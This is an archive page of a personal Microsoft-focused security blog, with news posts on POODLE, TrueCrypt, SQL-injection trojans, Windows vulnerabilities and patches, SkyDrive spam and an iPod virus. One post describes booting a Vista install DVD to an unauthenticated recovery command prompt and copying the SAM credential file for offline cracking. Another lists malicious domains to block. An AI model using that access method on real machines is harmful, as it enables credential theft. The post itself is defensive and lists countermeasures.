Search

You are currently browsing the archives for the Security category.

Disclaimer

Let it be known, long and far across all distant lands. This blog is totally independant from Microsoft and any other company or organisation and this blog (not the people) is not affiliated with Microsoft at all.

Users of Wi-Fi hotspots have been warned about the “Poodle” attack – the latest bug in Internet browsers that can hijack web sessions and transactions, and even extract data from secure HTTP connections, The Straits Times reported today.

Poodle, or Padding Oracle on Downgraded Legacy Encryption, exploits Secure Sockets Layer version 3 (SSLv3), one of the protocols used to secure Internet traffic, the Singapore daily said.

All major browsers, from Google Chrome to Mozilla Firefox, support SSLv3.

An attacker can access online banking or email systems “secured” by HTTP connections. The flaw was reported by Google employees – Bodo Möller, Thai Duong and Krzysztof Kotowicz – in a paper published on Thursday.

The Poodle attack relies on the fact that most web servers and browsers are still using an “ancient” SSLv3 to secure their communications.

Bitlocker was introduced when Vista was in the works, and Bitlocker became one of Microsoft’s key feature in pushing Windows Vista to the corporate customers.

For the people who doesn’t know what Bitlocker is: Bitlocker is a drive encryption technology by Microsoft. Unlike EFS (Encrypted File System) which is a file level encryption technology, Bitlocker will encrypt the entire disk or volume or partition. OS and data files would be encrypted.

If you need a full disk encryption but do not have the $$$ to purchase any of the above Windows Vista license, introducing – TrueCrypt 6.

TrueCrypt 6 is a full disk encryption just like Bitlocker, but it can do more than Bitlocker (sorry Microsoft!). Depending on the password that you input during the bootup, TrueCrypt will load the respective operating system the password corresponds to. So if you are being “knife-pointed” and was asked for your OS password, you can provide the thelf/attacker the password to load a not-so-important-operating system. Savvy?

Creating a volume in TrueCrypt

So how is it better/worse than Bitlocker? Here is my breakdown:

Pros of TrueCrypt:

– Much more flexible/More options VS Bitlocker: Simple straightforward wizard
– Different password to load different OS VS Bitlocker: Can only protect one OS/Not so straightforward if 2 or more OSes need to be protected.
– Type of encryption can be specified VS Bitlocker: Microsoft sets the Encryption for you.
– Protect/Hide different volumes VS Bitlocker: Not supported…

Yep…It’s still going-and its worse than ever it seems. Hundreds of thousands of unsuspecting people are stillstumbling across perfectly legitimate websites that have been compromised by an SQL injection,Â and as a result are infected with a nastyTrojan.
These types of Trojans are known for changing an affected systemâ€™s local DNS and Internet browser settings, thus making the system vulnerable for even more potential threats. (Trend Micro have written a very good post explaining what happens once infected)

Therefore IÂ thought I would take some time to mention a dew domains (courtesy of f-secure)Â admins should block to avoid any possible chance of infection:

yl18.net

www.bluell.cn

www.kisswow.com.cn

www.ririwow.cn

winzipices.cn

www.wowgm1.cn

www.killwow1.cn

www.wowyeye.cn

vb008.cn

9i5t.cn

computershello.cn

This is a good time to again mention thatÂ this not a vulnerability in Microsoft IIS or Microsoft SQL that is used to make this happen. If you are an administrator of a website that is using ASP/ASP.NET, you should make sure that you sanitize all inputs before you allow it to access the database.

There are many articles on how to do this such as this one. You could also have a look at URLScanwhich provides an easy way to filter this particular attack based on the length of the QueryString.

After investigating public reports, Microsoft has published Microsoft Security Advisory 951306, which describes a vulnerability that affects multiple versions of Windows (including Windows XP Professional Service Pack 2, all supported versions and editions of Windows Server 2003, Windows Vista, Windows Vista Service Pack 1, and Windows Server 2008.)

The newlyÂ found securityÂ flaw could potentially allowÂ a malicious local userÂ (who has authentication)Â to execute specially crafted code to raise his privilege level to LocalSystem. IIS and SQL Server are the main attack vectors. But other vectors are possible, such as Microsoft Distributed Transaction Coordinator (MSDTC) on Windows Server 2003.

The vulnerability looks like it basically allows for any process that has the SeImpersonatePrivilege to execute some code and be able to impersonate LocalSystem (which has the NT AUTHORITY\SYSTEM SID and a wealth of privileges in its token). For Windows 2003 and beyond the users awarded that privilege are in the Network Services, Local Services, Local System, and Administrators groups. On Vista/Server 2008 you additionally won’t have the privilege unless you’ve elevated. That fortunately reduces the scope of this otherwise highly serious vulnerability, though it still isn’t pretty.

It must be noted howeverÂ Microsoft stated in its advisory that- â€œHosting providers may be at increased risk from this elevation of privilege vulnerability.â€ However, no exploitation has been observed at this time.Microsoft Security Advisory 951306

One of my favorite documents for Windows Server 2003 is now available in beta form for Windows Server 2008.Â If you have never reviewed these guides I strongly recommend them.Â The guide makes it easy to tailor the security configuration to accommodate the needs of your organization.Â There is also a really cool GPOAccelerator (Group Policy Object Accelerator) tool to help you rapidly setup, test and deploy configurations of Group Policy security settings.Â Here are some of the resources for Windows Server 2008 Security Guide:

Microsoft’s Windows Live SkyDrive (formally Windows Live Folders) launched their public beta late last year. It is an online storage service for sharing files and links… and NOW it’s also an online repository for spammers to host links to their electronic junk-mail/spam.

The service lets you save information online for personal use; share information with select people based on their Live ID, with either read or contributor permissions; and makes content available to anyone via web-links. The Live SkyDrive interface is simple and intuitive, and the service currently enforces a 1GB limit.

As of late spammers have been abusing this service by taking advantage of a loophole (of such) within the Sky Drive system itself. So how do they do it?

So what makes services like these worth abusing and attractive to spammers?

Unique urls

Domains relatively safe from blacklisting

Link longevity

abuse handling issues

Features – host *almost anything*

Great Price

Someone else pays the hosting costs

Usually spammers use compromised servers in foreign countries or bonnets to send out their spam, however utilizing file sharing sites (such as SkyDrive) is not the newest trick in the book, this one just got hit…hard & suddenly.

Another interesting point is the number of times we trapped each URL was interestingly low for such a big campaign, I’d therefore estimate they had tens of thousands of files uploaded- McAfee Weblog.

Microsoft have come to the party however and are beginning to shut down these malicious SkyDrive accounts (some 24 hours after they had started), instead replacing the old malicious files with Sky Drive Welcome Notes as seen here.

Yet another instance of “If its free and worth abusing, discovery time is the variable these days”

As good as the recovery console in is Windows-it really aint that secure at all. Did you know that the Command Prompt tool found in Vista’s System Recovery Options doesn’t require a User Name or Password? And that the Command Prompt provides Administrator level access to the hard drive? For multiple versions of Windows? All you need is a Vista Install DVD and you’re all set to go.

Just boot from the DVD and select the Repair option:

Then select the Command Prompt:

Here you have full access to this computer, not only as an administrator but also as a system account user. After this you can insert usb-memory and copy any non-encrypted file from this computer to usb-memory and steal information without leaving any marks to the system or event viewer logs.Also, you could for example copy SAM-file (contains names and passwords of local users) from c:\windows\system32\config to usb-memory and start cracking computerâ€™s user password atÂ remote computer.

A cracker can:1. â€¦ copy files from hard disk to USB, floppy or network server2. â€¦ create / modify / delete files and folders3. â€¦ use most of the MS-DOS like commands4. â€¦ use this method in Vista, XP, 200x

To protect you computer or workstation, try to:

setup bios boot order so that booting from other media than hard disk is not possible

setup startup password from your bios (mainly in home computers)

use hard disk encryption software, if possible (such as bit locker)

encrypt files and folders using EFS, if mechanisms above are not possible

This kind of remindsÂ you of a Windows XP Home feature. The Administrator account password for XP Home is blank by default and is hidden in Normal Mode. But if you select F8 during boot for Safe Mode, you can access the Administrator account and have complete access to the computer.

Due to a stack-based buffer overrun that exists in the Windows DNS Server’s remote procedure call (RPC) interface, attackers can send an RPC packet to the interface enabling them to run malicious code on the system. This vulnerability could allow a criminal to run code in the security context of the Domain Name System Server Service in Microsoft Windows 2000 Server Service Pack 4, Windows Server 2003 Service Pack 1, and Windows Server 2003 Service Pack 2, which by default runs as Local SYSTEM.

Users are encouraged to follow its “Protect Your PC” guidance of enabling a firewall, applying all security updates and installing anti-virus and spyware software to help minimise the possibility of a successful attack.

Microsoft is also urging customers to disable remote management over RPC capability for DNS Servers through the registry key setting, as well as block unsolicited inbound traffic on ports between 1024 and 5000 and enable advanced TCP/IP filtering, which will act as a workaround and stop attackers exploiting this vulnerability.

As discussed in our previous blog, this update was earlier to the usual second Tuesday monthly Security Release because of the alarming increase of Malwares and sites exploiting the ANI vulnerability. Please make sure you install this security update right now!

Update: When you install the patch and have a computer with a Realtek Audio card you might get an error message saying “Rthdcpl.exe – Illegal System DLL Relocation”. Microsoft has released a hotfix for this so if you have this problem, you can download the fix here.

Microsoft’s January patches are now out. The update includes three critical patches that fix flaws in Excel, Outlook, and Internet Explorer. All of these allow remote code execution and can be used as a vector for virus or trojan attacks.

Â

At the moment,Â anti-virus vendors such as f-secure haven’t seen malware taking advantage of these vulnerabilities.

Microsoft has received and acknowledged that a new 0-Day exploit is public, and the proof-of-concept code announced for it is valid today on their Security Blog.

The proof-of-concept code targets the CSRSS (Client/Server Runtime Server Subsystem) the part of windows that launches and closes applications, the exploit affects all versions of Windows including the (un)released Windows Vista.
Tested on XP Service Pack 2 the proof-of-concept will cause the computer to crash resulting in a system lockup, system failure (Blue Screen of Death), or simple hard reboot.

Microsoft SRC said today â€œInitial indications are that in order for the attack to be successful, the attacker must already have authenticated access to the target system. Of course these are preliminary findings and we have activated our emergency response process involving a multitude of folks who are investigating the issue in depth to determine the full scope and potential impact to Microsoftâ€™s customers.â€

This is good news for users, as a patch is coming. The potential for attack, rated less critical by Secunia is still problematic if the system is infected by rootkits, or applications designed to allow remote access to a PC. The method of attack, and the way this exploit works, means there is no real protection for end users, other than to ensure you are fully patched, and your malware, spyware, and virus scanning software is running and up to date.

Windows XP SP2 Update KB917021 was published on October 17th 2006. What’s that you say?

It’s an update to “help prevent the Windows wireless client from advertising the wireless networks in its preferred networks list”. Those of you that travel with confidential information might want to investigate this patch. It wasn’t included in Microsoft’s monthly updates.

Advertising the name of your preferred networks creates the potential for a man-in-the-middle attack. This patch won’t stop your Windows notebook from using a spoofed network, but it will fix it so that the hacker would have to guess the name.

This update is further to the ones that were released on Tuesday where several code execution vulnerabilities. However December update does not include a patch for the number of recently discovered Word vulnerabilities.

Well… probably anyway. Not all “virus” are actually viruses you know; a lot of anti-virus suites pick up certain bits of code which could cause damage and they take the necessary precautions such as deleting the file or quarantining it. Sometimes JavaScript code can be seen as damaging which is unfortunate as all it wants to do is make something better for the user and I believe that’s what has happened in the case of Gmail.

I don’t use Gmail – I’m a Windows Live Mail user (but of course…) and only use Gmail for competitor reviewing and suchlike for my work. I logged in today and to my surprise Windows Live OneCare jumps in and tells me it’s detected a virus… actually on the main Gmail page after I entered my credentials.

Â

Â

To me, this tells me that Windows Live OneCare is incredibly good at picking up even the smallest threats (even when one might not be a threat at all), and that Gmail has unstable or insecure code. On the other hand, this tells me that Windows Live OneCare is too damn picky about what is a threat and what isn’t… and that Gmail has unstable or insecure code 😉

Apple Support has a very interesting notice available today. It seems that some of the iPod (video) units available for purchase from September 12th contain the RavMonE.exe virus. More details are available from: http://www.apple.com/support/windowsvirus/.

Also of interest is Apple’s framing of this support issue. Note that the notice is located in a sub-folder named “WindowsVirus” rather than “virus”. In fact, the words “Windows Virus” appear eight times while the name of the virus – RavMonE.exe – is mentioned only twice. Let’s be clear, some Apple iPods have shipped with a virus that affects mass storage devices. So it might not be a Mac OS or an iPod issue. But this is an Apple issue, not just Windows.

“Small number”, “less than 1%”, “less than 25”, and “easily restore” are also mentioned frequently in the notice. With more than eight million iPods shipped in Apple’s third quarter we would be interested in a raw number for that 1% effected by this. What’s one percent of a few million?

From the notice: “As you might imagine, we are upset at Windows for not being more hardy against such viruses, and even more upset with ourselves for not catching it.” Whom do you think the people that bought those iPods will be more upset with? Its just another little ploy to sell Apple computers.Â